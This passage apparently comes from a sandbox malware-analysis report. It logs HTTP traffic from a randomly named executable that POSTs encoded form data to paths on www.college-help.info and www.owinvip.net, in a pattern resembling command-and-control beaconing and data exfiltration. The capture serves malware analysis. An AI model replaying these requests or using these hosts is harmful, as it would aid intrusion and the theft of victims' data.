78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Nov 1, 2024 03:47:55.556021929 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50019	38.88.82.56	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:57.390554905 CET	749	OUT	POST /lk0h/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.college-help.info Origin: http://www.college-help.info Referer: http://www.college-help.info/lk0h/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 33 69 4c 6a 6b 45 41 6f 35 55 45 56 72 48 52 35 6e 52 42 46 76 43 66 4c 35 47 56 62 66 2f 66 6f 67 4c 51 56 74 31 72 43 53 4e 51 62 4b 31 54 39 44 6b 49 75 43 36 61 75 46 43 79 71 7a 51 56 4d 73 68 6a 66 67 48 6b 71 2f 5a 71 70 4d 63 47 68 41 6b 48 6a 70 44 47 33 45 6f 38 56 66 33 50 4e 6d 5a 30 56 41 66 62 64 47 33 75 30 53 63 53 4b 2f 4c 79 6f 6f 54 30 58 2b 45 66 46 78 65 45 38 6f 46 53 4c 4f 5a 45 73 46 36 72 63 71 72 41 7a 6f 75 30 71 4b 58 2f 6e 6c 74 64 47 2b 34 44 4a 6d 61 67 35 71 38 4b 33 41 74 2b 35 46 6a 71 68 67 44 31 6d 6e 63 2f 33 54 69 77 4a 55 4c 68 31 5a 63 38 74 65 6d 76 41 77 2f 37 6e 6a 74 78 38 76 5a 49 4a 42 56 6c 69 48 6c 47 65 Data Ascii: nl=3iLjkEAo5UEVrHR5nRBFvCfL5GVbf/fogLQVt1rCSNQbK1T9DkIuC6auFCyqzQVMshjfgHkq/ZqpMcGhAkHjpDG3Eo8Vf3PNmZ0VAfbdG3u0ScSK/LyooT0X+EfFxeE8oFSLOZEsF6rcqrAzou0qKX/nltdG+4DJmag5q8K3At+5FjqhgD1mnc/3TiwJULh1Zc8temvAw/7njtx8vZIJBVliHlGe
Nov 1, 2024 03:47:58.080775976 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:47:57 GMT Server: Apache Last-Modified: Wed, 30 Oct 2024 18:34:18 GMT ETag: "49d-625b5f32466a6" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Nov 1, 2024 03:47:58.080795050 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50020	38.88.82.56	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:59.963891029 CET	1766	OUT	POST /lk0h/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.college-help.info Origin: http://www.college-help.info Referer: http://www.college-help.info/lk0h/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 33 69 4c 6a 6b 45 41 6f 35 55 45 56 72 48 52 35 6e 52 42 46 76 43 66 4c 35 47 56 62 66 2f 66 6f 67 4c 51 56 74 31 72 43 53 4e 6f 62 4c 45 7a 39 53 30 30 75 44 36 61 75 49 69 79 52 7a 51 55 57 73 68 37 62 67 48 34 51 2f 64 61 70 4e 2f 2b 68 47 56 48 6a 69 44 47 33 49 49 38 55 52 58 50 59 6d 5a 6b 52 41 66 4c 64 47 33 75 30 53 65 4b 4b 35 61 79 6f 71 54 30 57 6f 55 66 52 67 4f 46 70 6f 42 32 78 4f 5a 77 6a 46 4a 6a 63 71 4c 77 7a 72 63 63 71 46 58 2f 68 73 39 63 42 2b 34 4f 4a 6d 65 41 44 71 39 2b 64 41 71 4b 35 56 31 4c 72 6c 68 73 37 7a 4d 62 52 5a 46 4d 2f 45 36 42 78 47 74 64 65 66 52 62 34 31 39 6e 6b 68 4c 5a 63 67 64 4a 36 65 78 46 6b 48 56 6e 58 42 59 71 68 5a 66 66 4c 51 73 2f 67 36 4f 72 51 2f 2f 50 31 62 73 41 2f 59 72 35 63 61 45 2b 4c 4f 46 48 7a 32 6d 65 55 45 34 36 79 64 69 66 35 55 47 58 43 34 30 44 62 49 30 56 59 65 6e 68 4e 55 50 4f 77 6b 45 38 58 2f 4d 6a 33 77 61 72 4e 77 66 41 44 64 77 71 37 6b 45 58 4d 4b 47 63 68 4e 75 45 54 4f 53 4a 7a 67 50 42 47 4b 6a 75 50 56 42 5a [TRUNCATED] Data Ascii: nl=3iLjkEAo5UEVrHR5nRBFvCfL5GVbf/fogLQVt1rCSNobLEz9S00uD6auIiyRzQUWsh7bgH4Q/dapN/+hGVHjiDG3II8URXPYmZkRAfLdG3u0SeKK5ayoqT0WoUfRgOFpoB2xOZwjFJjcqLwzrccqFX/hs9cB+4OJmeADq9+dAqK5V1Lrlhs7zMbRZFM/E6BxGtdefRb419nkhLZcgdJ6exFkHVnXBYqhZffLQs/g6OrQ//P1bsA/Yr5caE+LOFHz2meUE46ydif5UGXC40DbI0VYenhNUPOwkE8X/Mj3warNwfADdwq7kEXMKGchNuETOSJzgPBGKjuPVBZv6SiL7bTPcmMnBKVUoXmaddCRwssFt4kobmAc/QjTsxpVFf5RBjwRXGMdgTT0JuMaWbr7yZFsYtKY53eQXKb7ddF2dufSjnMEZLCSPaRWVTMpWOZfCfSU6WDNnQ+mECXvPimMKyuvSAQrP2LY+Yfv/wCu0vkWSfGhpXocMyWVUMqhHg6qvLzq3dLUJDFiuR9fuQqyBVH3sJIjBoWXPFOvwQZG84mZmigu+YU/T1fqJGVO2hitB4aRze85E8M2EFW+YGDLDr5JXu/aownis49e1EkhXZCMeko+VVGv6edLHgPBdZeGwipWIlhxNXItL+KjmypIZuT05+7vVBVo+W+VsPe4LEB/y9s2MZuNxKwCrbJ0ZFWtOKhXP5B4f+d/Jd+fUmEaeWhzzwuGplNFjUfaPacRUzkjKsOB0smY9eMftdJaBC/Dd8XwvJd5F2Vv797qTZ4cKYKOyZJT9/+u+dj8vXzOvSW9ttI5feEJWVChoFAcmu6EKgjY4mT9We62VHc3vA+2CQvKOq3E9HUH3hc4T1rds6ldjm8LYyFO3UWGYtVpRD4ZvdQFfTG5wVDzFchHzGdeJykbOmHiUHBhJT+KpWNkh0VVO4nYBggwytrn6JwSXHgFjKGz4XIkJiT9Mgoq/ZEfdCNPOeMxc2NUaKr5KgAPBpUYZSJd3 [TRUNCATED]
Nov 1, 2024 03:48:00.652173996 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:48:00 GMT Server: Apache Last-Modified: Wed, 30 Oct 2024 18:34:18 GMT ETag: "49d-625b5f32466a6" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Nov 1, 2024 03:48:00.652193069 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50021	38.88.82.56	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:02.496306896 CET	471	OUT	GET /lk0h/?dbL=d8WX_v0PGVHXAtK&nl=6gjDnw5yzGoGzEh3mjJB1T6RyTIMcIq1/sFM8kPHd8kBOmP5HGhCeqzML2uvlXpT0wvdsm4ji4CabuXPMFeElEmTDOsUVTaZy7krB/rdHBCDX+Ht0YGWoHEVrkeyh8Ng2A== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.college-help.info User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:48:03.203526974 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:48:03 GMT Server: Apache Last-Modified: Wed, 30 Oct 2024 18:34:18 GMT ETag: "49d-625b5f32466a6" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Nov 1, 2024 03:48:03.203552008 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50022	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:08.334762096 CET	711	OUT	POST /17h7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.owinvip.net Origin: http://www.owinvip.net Referer: http://www.owinvip.net/17h7/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 7a 67 52 4b 39 61 61 58 62 52 6a 31 73 61 46 32 41 56 4e 51 35 4b 75 34 52 39 48 47 70 31 46 64 37 6d 6e 7a 6d 45 58 34 63 74 65 6c 32 45 2b 53 68 6f 45 64 6e 59 57 7a 62 52 54 4f 74 71 66 51 2b 56 76 50 50 78 4b 2f 6f 74 36 44 67 6b 71 71 44 78 5a 76 67 5a 41 51 49 63 76 77 34 63 35 35 77 75 2f 64 55 56 4e 74 57 66 65 58 2b 6d 6a 4b 4c 68 34 47 73 62 41 4b 74 57 68 53 67 6a 51 71 41 46 74 72 73 55 38 75 4c 4b 70 73 39 4c 78 66 78 4a 30 79 62 51 6f 4b 74 4d 43 72 2f 54 74 71 79 4d 64 70 70 6a 6e 79 57 41 38 6d 61 31 62 6a 4d 53 78 42 62 6f 45 56 74 56 72 58 34 68 4d 71 49 57 55 7a 4b 73 41 3d Data Ascii: nl=zgRK9aaXbRj1saF2AVNQ5Ku4R9HGp1Fd7mnzmEX4ctel2E+ShoEdnYWzbRTOtqfQ+VvPPxK/ot6DgkqqDxZvgZAQIcvw4c55wu/dUVNtWfeX+mjKLh4GsbAKtWhSgjQqAFtrsU8uLKps9LxfxJ0ybQoKtMCr/TtqyMdppjnyWA8ma1bjMSxBboEVtVrX4hMqIWUzKsA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50023	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:10.880192995 CET	731	OUT	POST /17h7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.owinvip.net Origin: http://www.owinvip.net Referer: http://www.owinvip.net/17h7/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 7a 67 52 4b 39 61 61 58 62 52 6a 31 71 35 64 32 4d 57 6c 51 6f 71 75 35 66 64 48 47 6a 56 46 52 37 6d 72 7a 6d 46 44 57 64 65 36 6c 32 6c 4f 53 69 70 45 64 72 34 57 7a 55 78 54 4c 79 36 65 53 2b 56 54 48 50 78 6d 2f 6f 73 65 44 67 68 4f 71 44 43 42 67 68 4a 41 53 42 38 76 6c 31 38 35 35 77 75 2f 64 55 56 59 41 57 66 32 58 2b 58 54 4b 4e 41 34 48 67 37 41 4a 71 57 68 53 71 44 51 78 41 46 74 64 73 51 30 49 4c 4a 42 73 39 4f 4e 66 78 64 68 41 56 51 70 50 6a 73 44 4a 33 69 45 79 72 39 30 67 31 6c 71 6f 4a 44 6b 54 62 44 71 4a 57 77 35 70 49 49 6f 74 39 47 6a 67 70 52 74 44 53 31 45 44 55 37 57 66 75 42 78 6f 4a 78 4a 79 33 58 4f 41 51 52 5a 75 62 2b 41 6a Data Ascii: nl=zgRK9aaXbRj1q5d2MWlQoqu5fdHGjVFR7mrzmFDWde6l2lOSipEdr4WzUxTLy6eS+VTHPxm/oseDghOqDCBghJASB8vl1855wu/dUVYAWf2X+XTKNA4Hg7AJqWhSqDQxAFtdsQ0ILJBs9ONfxdhAVQpPjsDJ3iEyr90g1lqoJDkTbDqJWw5pIIot9GjgpRtDS1EDU7WfuBxoJxJy3XOAQRZub+Aj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50024	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:13.424329996 CET	1748	OUT	POST /17h7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.owinvip.net Origin: http://www.owinvip.net Referer: http://www.owinvip.net/17h7/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 7a 67 52 4b 39 61 61 58 62 52 6a 31 71 35 64 32 4d 57 6c 51 6f 71 75 35 66 64 48 47 6a 56 46 52 37 6d 72 7a 6d 46 44 57 64 65 79 6c 31 58 32 53 6b 36 63 64 6f 34 57 7a 4b 68 54 4b 79 36 65 54 2b 56 4c 44 50 78 37 64 6f 76 32 44 6a 43 32 71 4c 58 31 67 72 4a 41 53 44 38 75 43 34 63 35 67 77 75 50 5a 55 56 49 41 57 66 32 58 2b 55 62 4b 4e 52 34 48 6d 37 41 4b 74 57 68 65 67 6a 52 65 41 46 31 4e 73 51 78 31 4c 35 68 73 38 76 39 66 30 75 5a 41 4b 67 70 4e 75 4d 44 76 33 69 59 54 72 39 35 62 31 6c 32 47 4a 44 63 54 61 6c 33 76 4b 6a 67 33 52 65 6b 74 2f 47 33 58 34 56 6c 30 61 54 41 74 59 59 32 70 6a 67 31 31 44 31 38 2b 69 44 44 63 53 31 6c 4c 52 34 56 78 34 47 66 7a 64 67 35 5a 33 32 30 62 33 41 76 62 71 43 53 48 61 47 61 41 73 6d 49 48 4e 71 42 69 4c 36 74 77 33 73 69 67 6c 6c 30 4d 54 30 38 54 39 46 49 6e 79 67 63 63 67 43 66 46 36 6c 4c 39 47 5a 45 2f 78 76 4d 64 72 4d 6e 4e 7a 77 36 5a 34 44 63 6c 69 6c 6c 6b 78 72 35 6e 38 73 77 66 79 4e 2f 61 45 69 6f 37 49 31 79 31 59 32 79 59 53 6e 44 [TRUNCATED] Data Ascii: nl=zgRK9aaXbRj1q5d2MWlQoqu5fdHGjVFR7mrzmFDWdeyl1X2Sk6cdo4WzKhTKy6eT+VLDPx7dov2DjC2qLX1grJASD8uC4c5gwuPZUVIAWf2X+UbKNR4Hm7AKtWhegjReAF1NsQx1L5hs8v9f0uZAKgpNuMDv3iYTr95b1l2GJDcTal3vKjg3Rekt/G3X4Vl0aTAtYY2pjg11D18+iDDcS1lLR4Vx4Gfzdg5Z320b3AvbqCSHaGaAsmIHNqBiL6tw3sigll0MT08T9FInygccgCfF6lL9GZE/xvMdrMnNzw6Z4Dclillkxr5n8swfyN/aEio7I1y1Y2yYSnDyMCyBm9MXlHRIRlAz65HbZTKaIZbV4tJi0kGMCKJ3g7AySyKakw12woVKxoPBx1lTvu50yMn7o34JaJvLLzZQWYsylv2jR2OR6GLjqtHDVERLUd1WwvV2/aRrdLNT6a0y51Q+H2PetuVOcYsVzyZ3yi5m/mLX+lPCnQ3AAmzusyGyOHVV3B/s4OkxkcrKxN9EGC3IiBFcP7k9bE60Lj4Y5ecC4A7h4uGpI38fAPnt5pbZv7jFjIeIU1eijRHPVOJ6tNi1mS0kj8ZXEGWrqDM8i+SrVhAQQXxSC1B3b81cATg5AH+1Cz9HIJeKkhxd53BqJYuwcSCZyP3KUrOhYqmnnT6nkkKBWDE6ezy6g/9g/n7i56wECRdWJPNB1M3C5nItn16rUqRljVpjKWZmqAI1svkK5d7prcjJOC4VN39MTfHbcpPiKDP2WehE1kBKGEISC/XKUrXT5zc3q8ftIlr9fl0dbY6n6ub/9MiOlyxfYZnS3mVSnryZmzge+RDNEvN6NaIGbAFqoTLmE2vwhEYSwJPWIal9XoxmGxdKV1JcPh7w9e4QnaH605zvVpRKWEUt2ZCs8HFAaeY1qEhmvJ3p1O/o81Qb53v5ESWnQcCYQKGKcUWoVbu+0UYA9JtkvXzxzhfTIxufw5fIqN4/Sxr9+WsRJQk3DJEvi [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50025	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:15.968162060 CET	465	OUT	GET /17h7/?nl=+i5q+uzPXmftyZtNZWFr8MC7YoCmvyBt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBtoaIRC/e00OgY88L+a0UDDIyF3kq1BSJhp/lI21Ai+QA6UQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.owinvip.net User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
